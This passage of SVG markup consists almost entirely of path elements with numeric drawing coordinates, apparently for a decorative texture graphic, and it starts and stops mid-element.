d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path 